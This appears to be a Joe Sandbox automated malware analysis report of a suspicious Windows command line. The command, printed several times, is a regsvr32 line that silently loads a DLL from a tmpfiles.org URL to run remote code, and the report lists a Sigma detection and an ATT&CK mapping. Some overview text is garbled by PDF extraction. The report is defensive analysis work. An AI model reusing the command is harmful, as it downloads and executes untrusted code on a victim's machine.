ID: 357160 Cookbook: defaultwindowscmdlinecookbook.jbs Time: 08:59:48 Date: 24/02/2021 Version: 31.0.0 Emerald Table of Contents
Table of Contents 2 Analysis Report 3 Overview 3 General Information 3 Detection 3 Signatures 3 Classification 3 Startup 3 Malware Configuration 3 Yara Overview 3 Sigma Overview 3 System Summary: 3 Signature Overview 3 System Summary: 4 Mitre Att&ck Matrix 4 Behavior Graph 4 Screenshots 5 Thumbnails 5 Antivirus, Machine Learning and Genetic Malware Detection 6 Initial Sample 6 Dropped Files 6 Unpacked PE Files 6 Domains 6 URLs 6 Domains and IPs 6 Contacted Domains 7 URLs from Memory and Binaries 7 Contacted IPs 7 General Information 7 Simulations 7 Behavior and APIs 8 Joe Sandbox View / Context 8 IPs 8 Domains 8 ASN 8 JA3 Fingerprints 8 Dropped Files 8 Created / dropped Files 8 Static File Info 8 No static file info 8 Network Behavior 8 Code Manipulations 8 Statistics 8 Behavior 8 System Behavior 9 Analysis Process: cmd.exe PID: 6988 Parent PID: 5036 9 General 9 File Activities 9 Analysis Process: conhost.exe PID: 7008 Parent PID: 6988 9 General 9 Analysis Process: regsvr32.exe PID: 7056 Parent PID: 6988 10 General 10 Disassembly 10 Code Analysis 10
Copyright null 2021 Page 2 of 10 Analysis Report
Overview
General Information Detection Signatures Classification
Analysis ID: 357160 SSiiiggmaa ddeettteeccttteedd::: RReeggssvvrrr3322 AAnnoomaalllyy Infos: CSCrirrgeemaatttaee ssd eaat eppcrrrotoeccdee:ss Rss eiiinng ssvuurss3pp2ee nAndndeoedmd maloyo… Most interesting Screenshot: PCPrrroeogagrrtraeams a dd opoereossc nenosotstt ssinhh ooswwu s mpeuuncchdh e aadcc ttmtiiivvoiii…
Ransomware RPRereogggiiisrsattteemrrrss d aao eDDsLL LnLot show much activi Miner Spreading
TRTrreiieegssis ttoeo r llsoo aadd D mLiLissssiinngg DDLLLLss TTrrriiieess tttoo lllooaadd miiissssiiinngg DDLLLLss mmaallliiiccciiioouusss malicious
Evader Phishing
sssuusssppiiiccciiioouusss Tries to load missing DLLs suspicious
cccllleeaann
clean
Exploiter Banker
Spyware Trojan / Bot
Adware
Score: 22 Range: 0 - 100 Whitelisted: false Confidence: 80%
Startup
System is w10x64 cmd.exe (PID: 6988 cmdline: cmd /C 'regsvr32 -s https://tmpfiles.org/dl/161971/k.dll' MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) regsvr32.exe (PID: 7056 cmdline: regsvr32 -s https://tmpfiles.org/dl/161971/k.dll MD5: 426E7499F6A7346F0410DEAD0805586B) cleanup
Malware Configuration
No configs have been found
Yara Overview
No yara matches
Sigma Overview
System Summary:
Sigma detected: Regsvr32 Anomaly
Signature Overview
Copyright null 2021 Page 3 of 10 • Networking • System Summary • Data Obfuscation • Malware Analysis System Evasion • Anti Debugging • HIPS / PFW / Operating System Protection Evasion
Click to jump to signature section
System Summary:
Mitre Att&ck Matrix
Remote Initial Privilege Defense Credential Lateral Command Network Service Access Execution Persistence Escalation Evasion Access Discovery Movement Collection Exfiltration and Control Effects Effects Impact Valid Windows DLL Side- Process Regsvr32 1 OS Security Remote Data from Exfiltration Data Eavesdrop on Remotely Modify Accounts Management Loading 1 Injection 1 1 Credential Software Services Local Over Other Obfuscation Insecure Track Device System Instrumentation Dumping Discovery 1 System Network Network Without Partition Medium Communication Authorization Default Scheduled Boot or DLL Side- Process LSASS System Remote Data from Exfiltration Junk Data Exploit SS7 to Remotely Device Accounts Task/Job Logon Loading 1 Injection 1 1 Memory Information Desktop Removable Over Redirect Phone Wipe Data Lockout Initialization Discovery 1 Protocol Media Bluetooth Calls/SMS Without Scripts Authorization Domain At (Linux) Logon Script Logon Script DLL Side- Security Query SMB/Windows Data from Automated Steganography Exploit SS7 to Obtain Delete Accounts (Windows) (Windows) Loading 1 Account Registry Admin Shares Network Exfiltration Track Device Device Device Manager Shared Location Cloud Data Drive Backups
Behavior Graph
Copyright null 2021 Page 4 of 10 Hide Legend Legend: Process
Behavior Graph Signature Created File ID: 357160 DNS/IP Info Cookbook: defaultwindowscmdlinecookbook.jbs Is Dropped Startdate: 24/02/2021 Architecture: WINDOWS Is Windows Process Score: 22 Number of created Registry Values
Number of created Files
Visual Basic
Sigma detected: Regsvr32 Delphi started Anomaly Java
.Net C# or VB.NET
C, C++ or other language
cmd.exe Is malicious Internet
1
started started
conhost.exe regsvr32.exe
Screenshots
Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Copyright null 2021 Page 5 of 10 Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
No Antivirus matches
Dropped Files
No Antivirus matches
Unpacked PE Files
No Antivirus matches
Domains
No Antivirus matches
URLs
No Antivirus matches
Domains and IPs
Copyright null 2021 Page 6 of 10 Contacted Domains
No contacted domains info
URLs from Memory and Binaries
Name Source Malicious Antivirus Detection Reputation https://tmpfiles.org/dl/161971/k.dllWinsta0 regsvr32.exe, 00000002.0000000 false unknown 2.325527375.00000000027F0000.0 0000004.00000020.sdmp https://tmpfiles.org/dl/161971/k.dll regsvr32.exe, 00000002.0000000 true unknown 2.325634312.0000000002AB0000.0 0000004.00000040.sdmp https://tmpfiles.org/dl/161971/k.dllregsvr32 regsvr32.exe, 00000002.0000000 false unknown 2.325527375.00000000027F0000.0 0000004.00000020.sdmp
Contacted IPs
No contacted IP infos
General Information
Joe Sandbox Version: 31.0.0 Emerald Analysis ID: 357160 Start date: 24.02.2021 Start time: 08:59:48 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 2m 53s Hypervisor based Inspection enabled: false Report type: light Cookbook file name: defaultwindowscmdlinecookbook.jbs Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes analysed: 4 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: HCA enabled EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: SUS Classification: sus22.win@4/0@0/0 EGA Information: Failed HDC Information: Failed HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 Cookbook Comments: Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated Warnings: Show All Exclude process from analysis (whitelisted): svchost.exe
Simulations
Copyright null 2021 Page 7 of 10 Behavior and APIs
No simulations
Joe Sandbox View / Context
IPs
No context
Domains
No context
ASN
No context
JA3 Fingerprints
No context
Dropped Files
No context
Created / dropped Files
No created / dropped files found
Static File Info
No static file info
Network Behavior
No network behavior found
Code Manipulations
Statistics
Behavior
Copyright null 2021 Page 8 of 10 • cmd.exe • conhost.exe • regsvr32.exe
Click to jump to process
System Behavior
Analysis Process: cmd.exe PID: 6988 Parent PID: 5036
General
Start time: 09:00:35 Start date: 24/02/2021 Path: C:\Windows\SysWOW64\cmd.exe Wow64 process (32bit): true Commandline: cmd /C 'regsvr32 -s https://tmpfiles.org/dl/161971/k.dll' Imagebase: 0x2a0000 File size: 232960 bytes MD5 hash: F3BDBE3BB6F734E357235F4D5898582D Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high
File Activities
Source File Path Access Attributes Options Completion Count Address Symbol
Analysis Process: conhost.exe PID: 7008 Parent PID: 6988
General
Start time: 09:00:36 Start date: 24/02/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff61de10000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high
Copyright null 2021 Page 9 of 10 Analysis Process: regsvr32.exe PID: 7056 Parent PID: 6988
General
Start time: 09:00:36 Start date: 24/02/2021 Path: C:\Windows\SysWOW64\regsvr32.exe Wow64 process (32bit): true Commandline: regsvr32 -s https://tmpfiles.org/dl/161971/k.dll Imagebase: 0x100000 File size: 20992 bytes MD5 hash: 426E7499F6A7346F0410DEAD0805586B Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high
Disassembly
Code Analysis
Copyright null 2021 Page 10 of 10